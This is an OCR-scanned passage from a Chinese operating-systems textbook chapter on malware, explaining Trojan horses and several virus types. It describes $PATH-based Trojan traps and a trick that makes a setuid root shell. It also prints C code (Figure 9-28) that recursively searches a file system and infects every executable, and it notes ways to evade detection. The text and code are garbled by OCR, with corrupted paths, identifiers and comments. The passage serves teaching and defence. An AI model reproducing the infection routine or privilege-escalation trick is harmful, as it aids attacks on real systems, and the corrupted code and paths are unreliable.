我 们 不 打算 继续 深入 地 讨论 这 个 问题 ， 读 者 到 这 里 已 经 了 解 关于 恶意 软件 的 基本 情况 ， 如 果 想 了 解 
更 多 内 容 ， 请 在 搜索 引擎 中 输入 “恶意 软件 ”。 

很 多 人 会 问 :“ 为 什么 恶意 软件 会 如 此 容易 地 传播 开 来 ? ”产生 这 种 情况 的 原因 有 很 多 。 其 中 之 一 
是 世界 上 90% 的 计算 机 运行 的 是 单一 版 本 的 操作 系统 (Windows)， 使 得 它 成 为 一 个 非常 容易 被 攻击 的 目 
标 。 假 设 每 台 计 算 机 都 有 10 个 操作 系统 ， 其 中 每 个 操作 系统 占有 市 场 的 10%， 那 么 传播 恶意 代码 就 会 变 
得 加 倍 的 困难 。 这 就 好 比 在 生物 世界 中 ， 物 种 多 样 化 可 以 有 效 防止 生物 灭绝 。 

第 二 个 原因 是 ， 微 软 在 很 早 以 前 就 强调 其 Windows 操 作 系 统 对 于 没有 计算 机 专业 知识 的 人 而 言 是 简 
单 易 用 的 。 例 如 Windows 允 许 设置 在 没有 密码 的 情况 下 登录 ， 而 UNIX 从 诞生 之 初 就 始终 要 求 登录 密码 
(尽管 随 着 Linux 不 断 试图 向 Windows 靠 近 ， 这 种 传统 正在 逐步 地 淡化 ) ， 操 作 系 统 易 用 性 是 微软 一 贯 坚 
持 的 市 场 策略 ， 因 此 他 们 在 安全 性 与 易 用 性 之 间 不 断 进 行 着 权衡 。 如 果 读 者 认为 安全 性 更 加 重要 ， 那 么 
请 先 停止 阅读 ， 在 用 你 的 手机 打 电 话 之 前 先 为 它 注册 一 个 PIN 码 一 一 几乎 所 有 的 手机 都 有 此 功能 。 如 果 
你 不 知道 如 何 去 做 ， 那 么 请 从 生产 商 的 网 站 下 载 用 户 手册 。 

在 下 面 的 几 节 中 我 们 将 会 看 到 恶意 软件 更 为 一 般 化 的 形式 ， 读 者 将 会 看 到 这 些 软件 是 如 何 组 织 并 传 
播 的。 之 后 我 们 会 提供 对 恶意 软件 的 一 些 防御 方法 。 


9.9.1 特洛伊 木马 

编写 恶意 代码 是 第 一 步 ， 你 可 以 在 你 的 卧室 里 完成 这 件 事 情 。 然 而 让 数 以 百 万 计 的 人 将 你 的 程序 安 
装 到 他 们 的 电脑 中 则 是 完全 不 同 的 另 一 件 事 。 我 们 的 软件 编写 者 Mal 该 如 何 做 呢 ? 一 般 的 方法 是 编写 一 
些 有 用 的 程序 ， 并 将 恶意 代码 嵌入 到 其 中 。 游 戏 、 音 乐 播放 器 、 色 情书 刊 阅览 器 等 都 是 比较 好 的 选择 。 
人 们 会 自愿 地 下 载 并 安装 这 些 应 用 程序 。 作 为 安装 免费 软件 的 代价 ， 他 们 也 同时 安装 了 恶意 软件 。 这 种 
方式 叫 作 木马 攻击 (Torjan horse attack) ， 引 自 希 腊 荷 马 所 做 《奥德赛 》 中 装 满 了 希腊 士兵 的 木马 。 在 
计算 机 安全 世界 中 ， 它 指 人 们 自愿 下 载 的 软件 中 所 隐藏 的 恶意 软件 。 

当 用 户 下 载 的 程序 运行 时 ， 它 调用 函数 将 恶意 代码 写 入 磁盘 成 为 可 执行 程序 并 启动 该 程序 。 恶 意 代 
码 接 下 来 便 可 以 进行 任何 预先 设计 好 的 破坏 活动 ， 如 删除 、 修 改 或 加 密 文件 。 它 还 可 以 搜索 信用 卡号 、 
密码 和 其 他 有 用 的 信息 ， 并 且 通 过 互联 网 发 送 给 Mal。 该 恶意 代码 很 有 可 能 连接 到 某 些 IP 端 口上 以 监听 远 
程 命令 ， 将 该 计算 机 变 成 僵尸 机 器 ， 随 时 准备 发 送 垃圾 邮件 或 完成 攻击 者 的 指示 。 通 常情 况 下 ， 亚 意 代 
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木马 攻击 的 美妙 之 处 在 于 ， 木 马 的 拥有 者 不 必 自 己 费 尽心 机 侵入 到 受害 者 的 计算 机 中 ， 因 为 木马 是 
| 身受 害 者 自己 安装 的 。 
' 还 有 许多 其 他 方法 引诱 受害 人 执行 特洛伊 木马 程序 。 如 ， 许 多 UNIX 用 户 都 有 一 个 环境 变量 $PATH， 
”这 是 一 个 控制 查找 哪些 目录 的 命令 。 在 shell 程 序 中 键入 
echo $PATH 
”就 可 以 查看 。 
例如 ， 用 户 ast 在 系统 上 设置 的 环境 变量 可 能 会 包括 以 下 目录 : 
:/usr/ast/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/ucb:/usr/man\ 
:/usr/java/bin:/usr/java/lib:/usr/local/man:/usr/openwin/man 
其 他 用 户 可 能 设置 不 同 的 查找 路 径 。 当 用 户 在 shell 中 键入 
| prog 
”后 ，shell 会 查看 在 目录 /usr/ast/bin/prog 下 是 否 有 程序 。 如 果 有 就 执行 ， 如 果 没 有 ，shell 会 尝试 查找 
/usr/local/bin/prog、/usr/bin/prog、/bin/prog， 直 到 查 遍 所 有 10 个 目录 为 止 。 假 定 这 些 目录 中 有 一 个 目录 
未 被 保护 ， 骇 客 即 可 以 在 该 目录 下 放 一 个 程序 。 如 果 在 整个 目录 列表 中 ， 该 程序 是 第 一 次 出 现 ， esi 
运行 ， 从 而 特洛伊 木马 也 被 执行 
大 多 数 常用 的 程序 都 在 fbin 或 /usrrbin 中 ， 因 此 在 /usrybin/Xllls 中 放 一 个 木马 对 一 般 的 程序 而 言 不 会 
起 作用 。 因 为 真 的 版 本 会 先 被 找到 。 但 是 假设 骇 客 在 /usr/bin/X11 中 插入 了 la， 如 果 用 户 误 键入 la 而 不 是 
”ls ( 列 目录 命令 )， 那 么 特洛伊 木马 程序 就 会 运行 并 执行 其 功能 ， 随 后 显示 la 并 不 存在 的 正确 信息 以 迷惑 
用 户 。 通 过 在 复杂 的 目录 系统 中 插入 特洛伊 木马 程序 并 用 人 们 易 拼 错 的 单词 作为 名 字 ， 用 户 迟 早 会 有 机 
会 误 操作 并 激活 特洛伊 木马 i。 有 些 人 可 能 会 是 超级 用 户 (超级 用 户 也 会 误 操作 )， 于 是 特洛伊 木马 会 有 
| 机 会 把 /bin/ls 替 换 成 含有 特洛伊 木马 的 程序 ， 这 样 就 能 在 任何 时 候 被 激活 。 
Mal， 一 个 恶意 的 但 合法 的 用 户 ， 也 可 能 为 超级 用 户 放置 陷阱 。 他 用 含有 特洛伊 木马 程序 的 ls 命令 
| 更 换 了 原 有 的 版 本 ， 然 后 假装 做 一 些 秘密 的 操作 以 引起 超级 用 户 的 注意 ， 如 同时 打开 100 个 计算 约束 进 
o 程 。 当 超级 用 户 键入 下 列 命令 来 查看 Mal 的 目录 时 机 会 就 来 了 : 
cd /home /mal 
Is -| 
既然 某 些 shell 程 序 在 通过 $PATH 工 作 之 前 会 首先 确定 当前 所 在 的 目录 ， 那 么 超级 用 户 可 能 会 刚刚 激 
活 Mal 放 置 的 特洛伊 木马 。 特 洛 伊 木 马 可 以 把 /usr/mal/bin/sh 的 SETUID 设 为 root。 接 着 它 执行 两 个 操作 : 
用 chown 把 /usr/mal/bin/sh 的 owner 改 为 root， 然 后 用 chmod 设 置 SETUID 位 。 现 在 Mal 仅 仅 通过 运行 shell 
就 可 以 成 为 超级 用 户 了 。 
如 果 Mal 发 现 自己 缺 钱 ， 他 可 能 会 使 用 下 面 的 特洛伊 木马 来 找 钱 花 。 第 一 个 方法 是 ， 特 洛 伊 木马 程 
序 安装 诸如 Quicken 之 类 的 软件 检查 受害 人 是 否 有 银行 联机 程序 ， 如 果 有 就 直接 把 受害 人 账户 里 的 钱 转 
到 一 个 用 于 存 钱 的 虚拟 账户 (特别 是 国外 账户 ) 里 。 
第 二 个 方法 是 ， 特 阁 伊 木马 首先 关闭 modem 的 声音 ， 然 后 拨打 900 号 码 (支付 号 码 ) 到 偏远 国家 ， 
如 摩尔 多 瓦 (前 苏联 的 一 部 分 )。 如 果 特 洛 伊 木马 运行 时 用 户 在 线 ， 那 么 摩尔 多 瓦 的 900 号 码 就 成 为 该 用 
户 的 Internet 接 入 提供 者 (非常 昂贵 )， 这 样 用 户 就 不 会 发 觉 并 在 网 上 待 上 好 几 个 小 时 。 上 述 两 种 方法 都 
不 仅仅 是 假设 : 它们 都 曾 发 生 并 被 Denning (1999) 报道 过 。 关 于 后 一 种 方法 ， 曾 经 有 800 000 分 钟 连接 
”到 摩尔 多 瓦 ， 直 到 美国 联邦 交易 局 断 开 连 接 并 起 诉 位 于 长 岛 的 三 个 人 。 他 们 最 后 同意 归还 38 000 个 受害 
者 的 274 万 美元 。 


9.9.2 病毒 

本 节 我 们 将 介绍 病毒 ， 接 下 来 将 介绍 蠕虫 。 互 联网 上 已 有 很 多 病毒 方面 的 信息 ， 这 些 “ 魔 鬼 ” 早 已 
从 瓶子 里 跑 出 来 了 。 另 外 ， 人 们 在 不 知道 病毒 工作 原理 的 情况 下 很 难 去 防御 它们 ， 而 且 关 于 病毒 的 传播 
有 许多 错误 的 观念 需要 纠正 。 
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那么 ， 什 么 是 病毒 呢 ? 长 话 短 说 ， 病 毒 (virus) 是 一 种 特殊 的 程序 ， 它 可 以 通过 把 自己 植 入 到 其 他 
程序 中 来 进行 “繁殖 ”， 就 像 生物 界 中 真正 的 病毒 那样 。 除 了 繁殖 自身 以 外 ， 病 毒 还 可 以 做 许多 其 他 的 
事情 。 蠕 虫 很 像 病 毒 ， 但 其 不 同 点 是 通过 自己 复制 自己 来 繁殖 。 不 过 这 不 是 我 们 关注 的 重点 ， 因 此 下 面 
我 们 将 用 “病毒 ”来 统称 上 面 两 种 恶意 程序 。 有 关 蠕 虫 的 内 容 会 在 9.7.3 节 中 讲解 。 

1. 病毒 工作 原理 

让 我 们 看 一 下 病毒 有 哪些 种 类 以 及 它们 是 如 何 工 作 的 。 病 毒 的 制造 者 ， 我 们 称 之 为 Virgil， 可 能 用 
汇编 语言 (或 者 C 语 言 ) 写 了 一 段 很 小 但 是 有 效 的 病毒 。 在 他 完成 这 个 病毒 之 后 ， 他 利用 一 个 叫 作 
dropper 的 工具 把 病毒 插入 到 自己 计算 机 的 程序 里 ， 然 后 让 被 感染 的 程序 迅速 传播 。 也 许 贴 在 公告 板 上 ， 
也 许 作为 免费 软件 共享 在 Internet 上 。 这 一 程序 可 能 是 一 款 激动 人 心 的 游戏 ， 一 个 盗版 的 商业 软件 或 其 他 
能 引 人 注 意 的 软件 。 随 后 人 们 就 开始 下 载 这 一 病毒 程序 。 

一 旦 病毒 程序 被 安装 到 受害 者 的 计算 机 里 , 病毒 就 处 于 休 眼 状态 直到 被 感染 的 程序 被 执行 。 发 作 时 ， 
它 感染 其 他 程序 并 执行 自己 的 操作 。 通 常 ， 在 某 个 特定 日 期 之 前 病毒 是 不 执行 任何 操作 的 ， 直 到 某 一 天 
它 认 为 自己 在 被 关注 前 已 被 广泛 传播 时 才 发 作 。 被 选中 的 日 期 可 能 是 发 送 一 段 政治 信息 (如 在 病毒 编写 
者 所 在 的 宗教 团体 受 感 的 100 周 年 或 500 周 年 纪念 日 触发 )。 

在 下 面 的 讨论 中 ， 我 们 来 看 一 下 感染 不 同文 件 的 七 种 病毒 。 他 们 是 共事 者 、 可 执行 程序 、 内 存 、 引 
导 扁 区 、 驱 动 器 、 宏 以 及 源 代码 病毒 。 毫 无 疑问 ， 新 的 病毒 类 型 不 久 就 会 出 现 。 

2. 共事 者 病毒 

共事 者 病毒 (companion virus) 并 不 真正 感染 程序 ， 但 当 程 序 执行 的 时 候 它 也 执行 。 下 面 的 例子 很 
容易 解释 这 个 概念 。 在 MS-DOS 中 ， 当 用 户 输入 

prog 
MS-DOS 首 先 查 找 叫 作 prog.com 的 程序 。 如 果 没 有 找到 就 查找 叫 作 prog.exe 的 程序 。 在 Windows 里 ， 当 用 
户 点 击 Start (开始 ) 和 Run (运行 ) 后 ， 同 样 的 结果 会 发 生 。 现 在 大 多 数 的 程序 都 是 .exe 文 件 ，.com 文 
件 几 乎 很 少 了 。 

假设 Virgil 知 道 许 多 人 都 在 MS-DOS 提 示 符 下 或 点 击 Windows 的 Run 运 行 prog.exe。 他 就 能 简单 地 制 
造 一 个 叫 作 prog.com 的 病毒 ， 当 人 们 试图 运行 prog (除非 输入 的 是 全 名 prog.exe) 时 就 可 以 让 病毒 执行 。 
当 prog.com 完 成 了 工作 ， 病 毒 就 让 prog.exe 开 始 运行 而 用 户 显然 没有 这 么 聪明 。 

有 时候 类 似 的 攻击 也 发 生 在 Windows 操 作 系 统 的 桌面 上 ， 桌 面 上 有 连接 到 程序 的 快捷 方式 (符号 链 
接 ) 。 病 毒 能 够 改变 链接 的 目标 ， 并 指向 病毒 本 身 。 当 用 户 双击 图 标 时 ， 病 毒 就 会 运行 。 运 行 完毕 后 ， 
病毒 又 会 启动 正常 的 目标 程序 。 

3. 可 执行 程序 病毒 

更 复杂 的 一 类 病毒 是 感染 可 执行 程序 的 病毒 。 它 们 中 最 简单 的 一 类 会 覆盖 可 执行 程序 ， 这 叫 作 覆盖 
病毒 (overwriting virus) 。 它 们 的 感染 机 制 如 图 9-28 所 示 。 

病毒 的 主 程序 首先 将 自己 的 二 进 制 代码 复制 到 数组 里 ， 这 是 通过 打开 argv[0] 并 将 其 读 取 以 便 安全 调 
用 来 完成 的 。 然 后 它 通过 将 自己 变 为 根 目 录 来 截断 由 原来 的 根 目录 开始 的 整个 文件 系统 ， 将 根 目 录 作 为 
参数 调用 search 过 程 。 

递归 过 程 search 打 开 一 个 目录 ， 每 次 使 用 readdir 命 令 逐 一 读 取 入 口 地 址 ， 直 到 返回 值 为 NULL， 说 
明 所 有 的 入 口 都 被 读 取 过 。 如 果 入 口 是 目 录 ， 就 将 当前 目录 改 为 该 目录 ， 继 续 递归 调用 search， 如 果 入 
口 是 可 执行 文件 ， 就 调用 infect 过 程 来 感染 文件 ， 这 时 把 要 感染 的 文件 名 作为 参数 。 以 “.” 开 头 的 文件 
被 跳 过 以 避免 “.” 和 “..” 目 录 带 来 的 问题 。 同 时 符号 链接 也 被 跳 过 ， 因 为 系统 可 以 通过 chdir 系 统 调用 
进入 目录 并 通过 转 到 “..” 来 返回 ， 这 种 对 硬 连接 成 立 ， 对 符号 链接 不 成 立 。 更 完善 的 程序 同样 可 以 处 
理 符 号 链接 。 

真正 的 感染 程序 infect (尚未 介绍 ) 仅仅 打开 在 其 参数 中 指定 的 文件 并 把 数组 里 存放 的 病毒 代码 复 
制 到 文件 里 ， 然 后 再 关闭 文件 。 
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#include <sys/types.h> /# 标 准 的 POSIX 头 文件 +/ 
#include <sys/stat.h> 

#include <dirent.h> 

#include <fentl.h> 

#include <unistd.h> 


struct stat sbuf; /# 用 于 stat 调 用 ， 看 文件 是 否 为 sym 连 接 #/ 


search(char *dir_name) 

{ /# 可 执行 表 的 递归 查找 #/ 
DIR *dirp; 人 # 指 向 打开 目录 流 的 指针 #/ 
struct dirent «dp; /# 指 向 目录 项 的 指针 */ 


dirp = opendir(dir_name); /# 打 开 此 目录 *#/ 
if (dirp == NULL) return; /*# 不 能 打开 目录 时 返回 #/ 
while (TRUE) { D 

dp = readdir(dirp); /# 读 下 一 个 目录 项 #/ 


if (dp == NULL) { /*NULL 表 示 已 完成 操作 */ 
chdir (".."); /* [5] Bi) 52 A R*/ 
break; /# 跳 出 循环 #/ 


} 

if (dp->d_name[0] == '.') continue; = /* 跳 过 “.” 和 “..” 目 录 */ 

Istat(dp->d_name, &sbuf); /# 项 是 符号 连接 吗 ? */ 

if (S_ISLNK(sbuf.st_mode)) continue; /* 跳 过 符号 连接 */ 

if (chdir(dp->d_name) == 0) { yn Rehdir KI, NUE A ae*/ 
search("."); /# 如 果 是 ， 进 入 目录 查询 #/ 

} else { PFE (文件 ) ， 则 感染 #/ 
if (access(dp->d_name,X_OK) == 0) /# 如 是 可 执行 文件 就 感染 #/ 

infect(dp->d_name); 


} 
closedir(dirp); /*dir 运 行 完 毕 ， 关 闭 程 序 并 返回 */ 





图 9-28 在 UNIX 系 统 上 查找 可 执行 文件 的 递归 过 程 


病毒 可 以 通过 很 多 种 方法 不 断 “改善 "。 第 一 ， 可 以 在 infect 里 插入 产生 随机 数 的 测试 程序 然后 悄然 
返回 。 如 调用 超过 了 128 次 病毒 就 会 感染 ， 这 样 就 降低 了 病毒 在 大 范围 传播 之 前 就 被 被 检测 出 来 的 概率 。 
生物 病毒 也 具有 这 样 的 特性 : 那些 能 够 迅速 杀 死 受害 者 的 病毒 不 如 缓慢 发 作 的 病毒 传播 得 快 ， 慢 发 作 给 
了 病毒 以 更 多 的 机 会 扩散 。 另 外 一 个 方法 是 保持 较 高 的 感染 率 (如 25%)， 但 是 一 次 大 量 感 染 文件 会 降 
低 磁盘 性 能 ， 从 而 易于 被 发 现 。 

第 二 ，infect 可 以 检查 文件 是 否 已 被 感染 。 两 次 感染 相同 的 文件 无 疑 是 浪费 时 间 。 第 三 ， 可 以 采取 
方法 保持 文件 的 修改 时 间 及 文件 大 小 不 变 , 这 样 可 以 协助 把 病毒 代码 隐藏 起 来 。 对 大 于 病毒 的 程序 来 说 ， 
感染 后 程序 大 小 将 保持 不 变 ， 但 对 小 于 病毒 大 小 的 程序 来 说 ， 感 染 后 程序 将 变 大 。 多 数 病毒 都 比 大 多 数 
程序 小 ， 所 以 这 不 是 一 个 严重 的 问题 。 

一 般 的 病毒 程序 并 不 长 (整个 程序 用 C 语 言 编写 不 超过 1 页 ， 文 本 段 编译 后 小 于 2KB ) ， 汇 编 语 言 编 
写 的 版 本 将 更 小 。Ludwig (1998) 曾经 给 出 了 一 个 感染 目录 里 所 有 文件 的 MS-DOS 病 毒 ， 用 汇编 语言 
写 并 编译 后 仅 有 44 个 字 节 。 

稍 后 的 章节 将 研究 反 病毒 程序 ， 这 种 反 病毒 程序 可 以 跟踪 病毒 并 除去 它们 。 而 且 ， 在 图 9-28 里 很 有 趣 
的 情况 是 ， 病 毒 用 来 查找 可 执行 文件 的 方法 也 可 以 被 反 病 毒 程序 用 来 跟踪 被 感染 的 文件 并 最 终 清 除 病 毒 。 
感染 机 制 与 反感 染 机 制 是 相辅相成 的 ， 所 以 为 了 更 有 效 地 打击 病毒 ， 我 们 必须 详细 理解 病毒 工作 的 原理 。 

从 Virgil 的 观点 来 说 ， 病 毒 的 致命 问题 在 于 它 太 容易 被 发 现 了 。 毕 竟 当 被 感染 的 程序 运行 时 ， 病 毒 就 会 
感染 更 多 的 文件 ， 但 这 时 该 程序 就 并 不 能 正常 运行 ， 那 么 用 户 就 会 立即 发 现 。 所 以 ， 有 相当 多 的 病毒 把 自 
己 附 在 正常 程序 里 ， 在 病毒 发 作 时 可 以 让 原来 的 程序 正常 工作 。 这 类 病毒 叫 作 寄生 病毒 (parasitic virus), 

寄生 病毒 可 以 附 在 可 执行 文件 的 前 端 、 后 端 或 者 中 间 。 如 果 附 在 前 端 ， 病 毒 首先 要 把 程序 复制 到 
RAM 中 ， 把 自己 附加 到 程序 前 端 ， 然 后 再 从 RAM 里 复制 回来 ， 整 个 过 程 如 图 9-29b 所 示 。 遗 憾 的 是 ， 这 
时 的 程序 不 会 在 新 的 虚拟 地 址 里 运行 ， 所 以 病毒 要 么 在 程序 被 移动 后 重新 为 该 程序 分 配 地 址 ， 要 么 在 完 
成 自己 的 操作 后 缩 回 到 虚拟 地 址 0。 
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图 9-29 a) 一 段 可 执行 程序 ，b) 病毒 在 前 端 ，c) 病毒 在 后 端 ，d) 病毒 充斥 在 程序 里 的 多 余 空间 里 


为 了 避免 从 前 端 装 入 病毒 代码 带 来 的 复杂 操作 ， 大 多 数 病毒 是 后 端 装 入 的 ， 把 它们 自己 附 在 可 执行 
程序 末端 而 不 是 前 端 ， 并 且 把 文件 头 的 起 始 地 址 指向 病毒 ， 如 图 9-29c 所 示 。 现 在 病毒 要 根据 被 感染 程 
序 的 不 同 在 不 同 的 虚拟 地 址 上 运行 ， 这 意味 着 Virgil 必 须 使 用 相对 地 址 ， 而 不 是 绝对 地 址 来 保证 病毒 是 
位 置 独立 的 。 对 资深 的 程序 员 来 说 ， 这 样 做 并 不 难 ， 并 且 一 些 编译 器 根据 需要 也 可 以 完成 这 件 事 。 

复杂 的 可 执行 程序 格式 ， 如 Windows 里 的 ,exe 文件 和 UNIX 系 统 中 几乎 所 有 的 二 进 制 格式 文件 都 拥有 
多 个 文本 和 数据 段 ， 可 以 用 装载 程序 在 内 存 中 迅速 把 这 些 段 组 装 和 分 配 。 在 有 些 系统 中 (如 Windows)， 
所 有 的 段 都 包含 多 个 512 字 节 单 元 。 如 果 某 个 段 不 满 ， 链 接 程 序 会 用 0 填充 。 知 道 这 一 点 的 病毒 会 试图 隐 
藏 在 这 些 空洞 里 。 如 果 正 好 填 满 多 余 的 空间 ， 如 图 9-29d 所 示 ， 整 个 文件 大 小 将 和 未 感染 的 文件 一 样 保 
持 不 变 , 不 过 却 有 了 一 个 附加 物 ， 所 以 隐 含 的 病毒 是 幸运 的 病毒 。 这 类 病毒 叫 作 空 腔 病 毒 (cavity virus), 
当然 如 果 装 载 程序 不 把 多 余部 分 装 入 内 存 ， 病 毒 也 会 另 砚 途 径 。 

4. 内 存 驻 留 病毒 

到 目前 为 止 ， 我 们 假设 当 被 感染 的 程序 运行 时 ， 病 毒 也 同时 运行 ， 然 后 将 控制 权 交 给 真正 的 程序 ， 
最 后 退出 。 内 存 驻 留 病毒 (memory-resident virus) 与 此 相反 ， 它 们 总 是 驻 留 在 内 存 中 (RAM), BAR 
在 内 存 上 端 ， 要 么 藏 在 下 端的 中 断 变量 中 。 聪 明 的 病毒 甚至 可 以 改变 操作 系统 的 RAM 分 布 位 图 ， 让 系 
统 以 为 病毒 所 在 的 区 域 已 经 占用 ， 从 而 避免 了 被 其 他 程序 覆盖 。 

典型 的 内 存 驻 留 病毒 通过 把 陷阱 或 中 断 向 量 中 的 内 容 复 制 到 任意 变量 中 之 后 ， 将 自身 的 地 址 放置 其 
中 ， 俘 获 陷 阱 或 中 断 向 量 ， 从 而 将 该 陷阱 或 中 断 指 向 病毒 。 最 好 的 选择 是 系统 调用 陷阱 ， 这 样 病毒 就 可 
以 在 每 一 次 系统 调用 时 运行 (在 核心 态 下 ) 。 病 毒 运行 完 之 后 ， 通 过 跳 转 到 所 保存 的 陷阱 地 址 重新 激活 
真正 的 系统 调用 。 

为 什么 病毒 在 每 次 系统 调用 时 都 要 运行 呢 ? 这 是 因为 病毒 想 感染 程序 。 病 毒 可 以 等 待 直到 发 现 一 个 
exec 系 统 调用 ， 从 而 判断 这 是 一 个 可 执行 二 进 制 (而且 也 许 是 一 个 有 价值 的 ) 代码 文件 ， 于 是 决定 感染 
它 。 这 一 过 程 并 不 需要 大 量 的 磁盘 活动 ， 如 图 9-27 所 示 ， 所 以 难以 被 发 现 。 捕 捉 所 有 的 系统 调用 也 给 了 
病毒 潜在 的 能 力 ， 可 以 监视 所 有 的 数据 并 造成 种 种 危害 。 

5. 引导 扇 区 病毒 

正如 我 们 在 第 5 章 所 讨论 的 ， 当 大 多 数 计算 机 开机 时 ，BIOS 读 引导 磁盘 的 主 引 导 记 录放 入 RAM 中 并 
运行 。 引 导 程 序 判断 出 哪 一 个 是 活动 分 区 ， 从 该 分 区 读 取 第 一 个 扇 区 ， 即 引导 遍 区 ， 并 运行 。 随 后 ， 系 
统 要 么 装 入 操作 系统 要 么 通过 装载 程序 导入 操作 系统 。 但 是 ， 多 年 以 前 Virgil 的 朋友 发 现 可 以 制作 一 种 
病毒 覆盖 主 引导 记录 或 引导 扇 区 ， 并 能 造成 灾难 性 的 后 果 。 这 种 叫 作 引导 扇 区 病毒 (boot sector virus), 
它们 现在 已 十 分 普遍 了 。 

通常 引导 启 区 病毒 (包括 MBR ( 主 引导 记录 ) 病毒 )， 首 先 把 真正 的 引导 记录 遍 区 复制 到 磁盘 的 安 
全 区 域 ， 这 样 就 能 在 完成 操作 后 正常 引导 操作 系统 。Microsoft 的 磁盘 格式 化 工具 fdisk 往 往 跳 过 第 一 个 磁 
道 ， 所 以 这 是 在 Windows 机 器 中 隐藏 引导 记录 的 好 地 方 。 另 一 个 办 法 是 使 用 磁盘 内 任意 空闲 的 遍 区 ， 然 
后 更 新 坏 扇 区 列表 ， 把 隐藏 引导 记录 的 扇 区 标记 为 坏 遍 区。 实际 上 ， 由 于 病毒 相当 庞大 ， 所 以 它 也 可 以 
把 自身 剩余 的 部 分 伪装 成 坏 遍 区 。 如 果 根 目录 有 足够 大 的 固定 空间 ， 如 在 Windows 98 中 ， 根 目录 的 末端 
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也 是 一 个 隐藏 病毒 的 好 地 方 。 真 正 具有 攻击 性 的 病毒 甚至 可 以 为 引导 记录 扁 区 和 自身 重新 分 配 磁盘 空间 ， 
并 相应 地 更 新 磁盘 分 布 位 图 或 空闲 表 。 这 需要 对 操作 系统 的 内 部 数据 结构 有 详细 的 了 解 ， 不 过 Virgil 有 
一 个 很 好 的 教授 专门 讲解 和 研究 操作 系统 。 

当 计算 机 启动 时 ， 病 毒 把 自身 复制 到 RAM 中 ， 要么 隐藏 在 顶部 ， 要 么 在 未 使 用 的 中 断 向 量 中 。 由 
于 此 时 计算 机 处 于 核心 态 ，MMU 处 于 关闭 状态 ， 没 有 操作 系统 和 反 病 毒 程序 在 运行 ， 所 以 这 对 病毒 来 
说 是 天 赐 良 机 。 当 一 切 准备 就 绪 时 ， 病 毒 会 启动 操作 系统 ， 而 自己 则 往往 驻 留 在 内 存 里 ， 所 以 它 能 够 监 
视 情 况 变化 。 

然而 , 存在 如 何 再 次 获取 系统 控制 权 的 问题 。 常 用 的 办 法 要 利用 一 些 操作 系统 管理 中 断 向 量 的 技巧 。 
如 Windows 系 统 在 一 次 中 断后 并 不 重 置 所 有 的 中 断 向 量 。 相 反 ， 系 统 每 次 装 入 一 个 设备 驱动 程序 ， 每 一 
个 都 获取 所 需 的 中 断 向 量 。 这 一 过 程 要 持续 一 分 钟 左右 。 

这 种 设计 给 了 病毒 以 可 乘 之 机 。 它 可 以 捕获 所 有 中 断 向 量 ， 如 图 9-30a 所 示 。 当 加 载 驱动 程序 时 ， 
部 分 向 量 被 覆盖 ， 但 是 除非 时 钟 驱动 程序 首先 被 载 和 人， 否则 会 有 大 量 的 时 钟 中 断 用 来 激活 病毒 。 丢 失 了 
打印 机 中 断 的 情况 如 图 9-30b 所 示 。 只 要 病毒 发 现 有 某 一 个 中 断 向 量 已 被 覆盖 ， 它 就 再 次 覆盖 该 向 量 ， 
因为 这 样 做 是 安全 的 (实际 上 ， 有 些 中 断 向 量 在 启动 时 被 覆盖 了 好 几 次 ，Virgil 很 明白 是 怎么 回 事 )。 重 
新 夺回 打印 机 控制 权 的 示意 图 如 图 9-30c 所 示 。 在 所 有 的 一 切 都 加 载 完毕 后 ， 病 毒 恢复 所 有 的 中 断 向 量 ， 
而 仅仅 为 自己 保留 了 系统 调用 陷阱 向 量 。 至 此 ， 内 存 驻 留 病 毒 控制 了 系统 调用 。 事 实 上 ， 大 多 数 内 存 驻 
留 病 毒 就 是 这 样 开始 运行 的 。 





图 9-30 a) 病毒 捕获 了 所 有 的 中 断 向 量 和 陷阱 向 量 后 ，b) 操作 系统 夺回 了 打印 机 中 断 向 量 ，c) 病毒 意识 到 
打印 机 向 量 的 丢失 并 重新 夺回 了 控制 权 


6. 设备 驱动 病毒 

深入 内 存 有 点 像 洞 穴 探险 一 一 你 不 得 不 扭曲 身体 前 进 并 时 刻 担 心 物体 砸 落 在 头 上 。 如 果 操作 系统 能 
够 友好 并 光明 正大 地 装 入 病毒 ， 那 么 事情 就 好 办 多 了 。 其 实 只 要 那么 一 点 点 努力 ， 就 可 以 达到 这 一 目标 。 
解决 办 法 是 感染 设备 驱动 程序 ， 这 类 病毒 叫 作 设备 驱动 病毒 (device driver virus) 。 在 Windows 和 有 些 
UNIX 系 统 中 ， 设 备 驱 动 程序 是 位 于 磁盘 里 或 在 启动 时 被 加 载 的 可 执行 程序 。 如 果 有 一 个 驱动 程序 被 寄生 
病毒 感染 ， 病 毒 就 能 够 在 每 次 启动 时 被 正大 光明 地 载 入 。 而 且 ， 当 驱动 程序 运行 在 核心 态 下 ， 一 旦 被 加 载 
就 会 调用 病毒 ， 从 而 给 病毒 获取 系统 调用 的 陷阱 向 量 的 机 会 。 这 样 的 情况 促使 我 们 限制 驱动 程序 运行 在 用 
户 态 ， 这 样 的 话 即使 驱动 程序 被 病毒 感染 ， 它 们 也 不 能 像 在 内 核 态 的 驱动 程序 一 样 ， 造 成 很 大 的 危害 。 

7. 宏 病 毒 

许多 应 用 程序 ， 如 Word 和 Excel， 人 允许 用 户 把 一 大 捉 命 令 写 入 宏文 件 ， 以 便 日 后 一 次 按键 就 能 够 执 
行 。 宏 可 附 在 菜单 项 里 ， 这 样 当 菜 单项 被 选中 时 宏 就 可 以 运行 。 在 Microsoft Office 中 ， 宏 可 以 包含 完全 
用 Visual Basic 编 程 语言 编写 的 程序 。 宏 程序 是 解释 执行 而 不 是 编译 执行 的 ， 但 解释 执行 只 影响 运行 速度 
而 不 影响 其 执行 的 效果 。 宏 可 以 是 针对 特定 的 文档 ， 所 以 Office 就 可 以 为 每 一 个 文档 建立 宏 。 
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现在 我 们 看 一 看 问题 所 在 。Virgil 在 Word 里 建立 了 一 个 文档 并 创建 了 包含 OPEN FILE 功 能 的 宏 。 这 
个 宏 含有 一 个 宏 病 毒 代 码 。 然 后 他 将 文档 发 送 给 受害 人 ， 受 害 人 很 自然 地 打开 文件 (假设 E-mail 程序 还 
没有 打开 文件 )， 导 致 OPEN FILE 宏 开始 运行 。 既 然 宏 可 以 包含 任意 程序 ， 它 就 可 以 做 任何 事情 ， 如 感 
染 其 他 的 Word 文 档 ， 删 除 文件 等 。 对 Microsoft 来 说 ，Word 在 打开 含有 宏 的 文件 时 确实 能 给 出 警告 ,但 
